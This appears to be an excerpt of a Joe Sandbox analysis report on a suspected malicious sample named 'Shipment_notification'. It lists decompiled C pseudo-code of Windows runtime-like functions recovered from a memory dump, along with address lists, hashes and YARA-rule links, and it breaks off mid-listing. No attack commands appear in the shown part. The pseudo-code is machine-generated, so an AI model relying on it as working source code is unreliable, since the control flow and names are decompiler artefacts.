					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x1bd60f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L01B04620(0x1bd6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x1bd6100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}










                                                                                0x01b1bc36
                                                                                0x01b1bc42
                                                                                0x01b1bc45
                                                                                0x01b1bc4a
                                                                                0x01b1bd35
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b1bc50
                                                                                0x01b1bc50
                                                                                0x01b1bc58
                                                                                0x01b1bc5a
                                                                                0x01b1bc60
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b5a4f2
                                                                                0x01b5a4f6
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b5a4fc
                                                                                0x01b1bc79
                                                                                0x01b1bc7e
                                                                                0x01b1bc86
                                                                                0x01b1bd16
                                                                                0x01b1bd20
                                                                                0x01b1bd20
                                                                                0x01b1bc8d
                                                                                0x01b1bc94
                                                                                0x01b1bcbd
                                                                                0x01b1bcca
                                                                                0x01b1bccb
                                                                                0x01b1bccc
                                                                                0x01b1bccd
                                                                                0x01b1bcce
                                                                                0x01b1bcd4
                                                                                0x01b1bcea
                                                                                0x01b1bcee
                                                                                0x01b1bcf2
                                                                                0x01b1bd00
                                                                                0x01b1bd04
                                                                                0x00000000
                                                                                0x01b1bc96
                                                                                0x01b1bcab
                                                                                0x01b1bcaf
                                                                                0x01b1bd2c
                                                                                0x01b1bd2c
                                                                                0x01b1bd09
                                                                                0x00000000
                                                                                0x01b1bd09
                                                                                0x01b1bcb1
                                                                                0x01b1bcb5
                                                                                0x01b1bcbb
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b1bcbb

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 46d75ae6170a27282c66a5db2f7bd29729fbe2dbc49fa1760277218adfdf798d
                                                                                • Instruction ID: 4856e323773ead966b72bd2a84d99e23c7b5d0c6527ffd59309538e513fb4b8c
                                                                                • Opcode Fuzzy Hash: 46d75ae6170a27282c66a5db2f7bd29729fbe2dbc49fa1760277218adfdf798d
                                                                                • Instruction Fuzzy Hash: 0E310132A026069BCB1ADF98C5C0BA677B4FB18310F8601F8ED04DB209F734D9058B80
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B11DB5 Relevance: .1, Instructions: 87COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 60%
                                                                                			E01B11DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E01B0F460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L01B04620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E01B0F460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}












                                                                                0x01b11dc2
                                                                                0x01b11dc5
                                                                                0x01b11dc7
                                                                                0x01b11dcc
                                                                                0x01b11dce
                                                                                0x01b11dd6
                                                                                0x01b11ddf
                                                                                0x01b11de0
                                                                                0x01b11de1
                                                                                0x01b11de5
                                                                                0x01b11de8
                                                                                0x01b11def
                                                                                0x01b11df0
                                                                                0x01b11df6
                                                                                0x01b11df7
                                                                                0x01b11dfe
                                                                                0x01b11e1a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b11e0b
                                                                                0x01b11e12
                                                                                0x01b11e12
                                                                                0x01b11e00
                                                                                0x01b11e00
                                                                                0x01b11e05
                                                                                0x01b11e1e
                                                                                0x01b11e23
                                                                                0x01b5570f
                                                                                0x01b55713
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b55719
                                                                                0x01b55719
                                                                                0x01b11e2c
                                                                                0x01b11e2d
                                                                                0x01b11e2e
                                                                                0x01b11e2f
                                                                                0x01b11e31
                                                                                0x01b11e32
                                                                                0x01b11e35
                                                                                0x01b11e3d
                                                                                0x01b55723
                                                                                0x01b5573d
                                                                                0x01b5573d
                                                                                0x00000000
                                                                                0x01b55723
                                                                                0x01b11e49
                                                                                0x01b11e4e
                                                                                0x01b11e4e
                                                                                0x01b11e09
                                                                                0x00000000

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                                • Instruction ID: 19aac1eb04749f0b8fb6a11c4662d0c2b775ad978741d6eb9250613a3af54a57
                                                                                • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                                • Instruction Fuzzy Hash: 26217F72600119EFD729CFADCC80EAABBBDEF85680F564195EA0597250D734AE01C7A0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01AE9100 Relevance: .1, Instructions: 87COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 76%
                                                                                			E01AE9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x1bbf6e8);
				E01B3D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E01BB88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E01B3D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x1bd86c0; // 0x15807b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x1bd86b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E01B02280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E01BB88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E01B2AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x1bdb1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x1bd84c0;
										if(_t69 >=  *0x1bd84c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E01BB9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E01AE922A(_t82);
							_t53 = E01B07D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E01BB8B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x1bd86c0; // 0x15807b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x1bd86b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x1bd86bc;
										_t72 = 0x1bd86b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E01AE9240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x1bd86c4;
									_t72 = 0x1bd86c0;
									L18:
									E01B19B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















                                                                                0x01ae9100
                                                                                0x01ae9100
                                                                                0x01ae9100
                                                                                0x01ae9100
                                                                                0x01ae9102
                                                                                0x01ae9107
                                                                                0x01ae910c
                                                                                0x01ae9110
                                                                                0x01ae9115
                                                                                0x01ae9136
                                                                                0x01ae9143
                                                                                0x01b437e4
                                                                                0x01b437e4
                                                                                0x01ae9149
                                                                                0x01ae914e
                                                                                0x01ae914e
                                                                                0x01ae9117
                                                                                0x01ae911d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01ae911f
                                                                                0x01ae9125
                                                                                0x00000000
                                                                                0x01ae9151
                                                                                0x01ae9158
                                                                                0x01ae915d
                                                                                0x01ae9161
                                                                                0x01ae9168
                                                                                0x01b43715
                                                                                0x00000000
                                                                                0x01ae916e
                                                                                0x01ae916e
                                                                                0x01ae9175
                                                                                0x01ae9177
                                                                                0x01ae917e
                                                                                0x01ae917f
                                                                                0x01ae9182
                                                                                0x01ae9182
                                                                                0x01ae9187
                                                                                0x01ae9187
                                                                                0x01ae918a
                                                                                0x01ae918d
                                                                                0x01ae918f
                                                                                0x01ae9192
                                                                                0x01ae9195
                                                                                0x01ae9198
                                                                                0x01ae9198
                                                                                0x01ae9198
                                                                                0x01ae919a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b4371f
                                                                                0x01b43721
                                                                                0x01b43727
                                                                                0x01b4372f
                                                                                0x01b43733
                                                                                0x01b43735
                                                                                0x01b43738
                                                                                0x01b4373b
                                                                                0x01b4373d
                                                                                0x01b43740
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b43746
                                                                                0x01b43749
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b4374f
                                                                                0x01b43751
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b43757
                                                                                0x01b43759
                                                                                0x01b4375c
                                                                                0x01b4375c
                                                                                0x01b4375e
                                                                                0x01b4375e
                                                                                0x01b43761
                                                                                0x01b43764
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b43766
                                                                                0x01b43768
                                                                                0x01b437a3
                                                                                0x01b437a3
                                                                                0x01b437a5
                                                                                0x01b437a7
                                                                                0x01b437ad
                                                                                0x01b437b0
                                                                                0x01b437b2
                                                                                0x01b437bc
                                                                                0x01b437c2
                                                                                0x01b437c2
                                                                                0x01b437b2
                                                                                0x01ae9187
                                                                                0x01ae9187
                                                                                0x01ae918a
                                                                                0x01ae918d
                                                                                0x01ae918f
                                                                                0x01ae9192
                                                                                0x01ae9195
                                                                                0x00000000
                                                                                0x01ae9195
                                                                                0x00000000
                                                                                0x01ae9187
                                                                                0x01b4376a
                                                                                0x01b4376a
                                                                                0x01b4376c
                                                                                0x01b4376c
                                                                                0x01b4376f
                                                                                0x01b43775
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b43777
                                                                                0x01b43779
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b43782
                                                                                0x01b43787
                                                                                0x01b43789
                                                                                0x01b43790
                                                                                0x01b43790
                                                                                0x01b4378b
                                                                                0x01b4378b
                                                                                0x01b4378b
                                                                                0x01b43792
                                                                                0x01b43795
                                                                                0x01b43795
                                                                                0x01b43798
                                                                                0x01b43798
                                                                                0x01b4379b
                                                                                0x01b4379b
                                                                                0x01ae91a3
                                                                                0x01ae91a9
                                                                                0x01ae91b0
                                                                                0x01ae91b4
                                                                                0x01ae91b4
                                                                                0x01ae91bb
                                                                                0x01ae91c0
                                                                                0x01ae91c5
                                                                                0x01ae91c7
                                                                                0x01b437da
                                                                                0x01ae91cd
                                                                                0x01ae91cd
                                                                                0x01ae91cd
                                                                                0x01ae91d2
                                                                                0x01ae91d5
                                                                                0x01ae9239
                                                                                0x01ae9239
                                                                                0x01ae91d7
                                                                                0x01ae91db
                                                                                0x01ae91e1
                                                                                0x01ae91e7
                                                                                0x01ae91fd
                                                                                0x01ae9203
                                                                                0x01ae921e
                                                                                0x01ae9223
                                                                                0x00000000
                                                                                0x01ae9223
                                                                                0x01ae9205
                                                                                0x01ae9208
                                                                                0x01ae920c
                                                                                0x01ae9214
                                                                                0x01ae9214
                                                                                0x01ae91e9
                                                                                0x01ae91e9
                                                                                0x01ae91ee
                                                                                0x01ae91f3
                                                                                0x01ae91f3
                                                                                0x01ae91f3
                                                                                0x01ae91e7
                                                                                0x00000000
                                                                                0x01ae91db
                                                                                0x01ae9187
                                                                                0x01ae9168

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1c194f680cf646d85c38ecda23b680b293296737b6f974985341b0f00371ebe4
                                                                                • Instruction ID: d1ac8a4d359012a6c19af3821cc173a4a231c89b9a24433f824e19cf81cc917b
                                                                                • Opcode Fuzzy Hash: 1c194f680cf646d85c38ecda23b680b293296737b6f974985341b0f00371ebe4
                                                                                • Instruction Fuzzy Hash: 46318C75A01385DFEB6ADBACC48CBAEBBF1BB48368F18818DD50467251D370E980CB51
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B00050 Relevance: .1, Instructions: 81COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 53%
                                                                                			E01B00050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x1bdd360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E01B19ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return L01B2B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E01BB8A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E01B19702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x1bdb1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















                                                                                0x01b00055
                                                                                0x01b0005d
                                                                                0x01b00062
                                                                                0x01b0006c
                                                                                0x01b0006f
                                                                                0x01b00074
                                                                                0x01b0007a
                                                                                0x01b0007a
                                                                                0x01b00080
                                                                                0x01b00080
                                                                                0x01b00087
                                                                                0x01b0008d
                                                                                0x01b0008f
                                                                                0x01b00093
                                                                                0x01b00095
                                                                                0x01b0009b
                                                                                0x01b000f8
                                                                                0x01b000fb
                                                                                0x01b000fc
                                                                                0x01b000ff
                                                                                0x01b00108
                                                                                0x01b00108
                                                                                0x01b000a2
                                                                                0x01b000a6
                                                                                0x01b000b3
                                                                                0x01b000bc
                                                                                0x01b000c5
                                                                                0x01b000ca
                                                                                0x01b4c01e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b4c02d
                                                                                0x01b000d5
                                                                                0x01b000d9
                                                                                0x01b4c03d
                                                                                0x01b4c046
                                                                                0x01b4c046
                                                                                0x01b000df
                                                                                0x01b000e2
                                                                                0x01b000ea
                                                                                0x01b000ef
                                                                                0x01b000f2
                                                                                0x01b000f6
                                                                                0x01b00111
                                                                                0x01b00117
                                                                                0x01b00117
                                                                                0x00000000
                                                                                0x01b000f6
                                                                                0x01b000d0
                                                                                0x01b000d0
                                                                                0x00000000

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b05fafbe1356aa384c0700fa483076e736359c4671ee17754a2b25015ec9bc8a
                                                                                • Instruction ID: 69f25fc5daf0373626560b0373a969449b3111fe7232baec91e1792f1fa1d2b7
                                                                                • Opcode Fuzzy Hash: b05fafbe1356aa384c0700fa483076e736359c4671ee17754a2b25015ec9bc8a
                                                                                • Instruction Fuzzy Hash: 1331C331201B05CFD72ADF28C840B56B7E5FF89754F1485ADE596C7B90EB71A801CB50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B66C0A Relevance: .1, Instructions: 79COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 77%
                                                                                			E01B66C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E01B07D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x1bd7b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L01B04620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E01B2F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E01B07D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E01B29AE0();
						_t23 = L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}












                                                                                0x01b66c0a
                                                                                0x01b66c0f
                                                                                0x01b66c10
                                                                                0x01b66c13
                                                                                0x01b66c15
                                                                                0x01b66c19
                                                                                0x01b66c1c
                                                                                0x01b66c21
                                                                                0x01b66c28
                                                                                0x01b66c3a
                                                                                0x01b66c2a
                                                                                0x01b66c33
                                                                                0x01b66c33
                                                                                0x01b66c3f
                                                                                0x01b66c48
                                                                                0x01b66c4d
                                                                                0x01b66c60
                                                                                0x01b66c65
                                                                                0x01b66c69
                                                                                0x01b66c73
                                                                                0x01b66c79
                                                                                0x01b66c7f
                                                                                0x01b66c86
                                                                                0x01b66c90
                                                                                0x01b66c94
                                                                                0x01b66ca6
                                                                                0x01b66cb2
                                                                                0x01b66cbd
                                                                                0x01b66cbd
                                                                                0x01b66cc3
                                                                                0x01b66cc7
                                                                                0x01b66ccb
                                                                                0x01b66cd0
                                                                                0x01b66cd1
                                                                                0x01b66ce2
                                                                                0x01b66ce2
                                                                                0x01b66c69
                                                                                0x01b66ced

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 317d20e5cdacc76091a73f154967d4aa5c4c6de5c20223ce99922f7b1044f3d3
                                                                                • Instruction ID: ed99a3125cf9b08be451a78e51017250cd8e26412fa6741476cc791d1a8687cf
                                                                                • Opcode Fuzzy Hash: 317d20e5cdacc76091a73f154967d4aa5c4c6de5c20223ce99922f7b1044f3d3
                                                                                • Instruction Fuzzy Hash: A821A071A00A55AFDB19DB58D840E65B7B8FF58740F0401A9F908D7791DB38ED10CBA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B290AF Relevance: .1, Instructions: 76COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 82%
                                                                                			E01B290AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E01B3D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E01B1E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L01B04620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E01B2F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E01B1A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























                                                                                0x01b290af
                                                                                0x01b290b8
                                                                                0x01b290bb
                                                                                0x01b290bf
                                                                                0x01b290c2
                                                                                0x01b290c2
                                                                                0x01b290c8
                                                                                0x01b290cb
                                                                                0x01b290cd
                                                                                0x01b614d7
                                                                                0x01b614eb
                                                                                0x01b614eb
                                                                                0x00000000
                                                                                0x01b614eb
                                                                                0x01b614db
                                                                                0x01b614e6
                                                                                0x00000000
                                                                                0x01b614f2
                                                                                0x01b614e8
                                                                                0x00000000
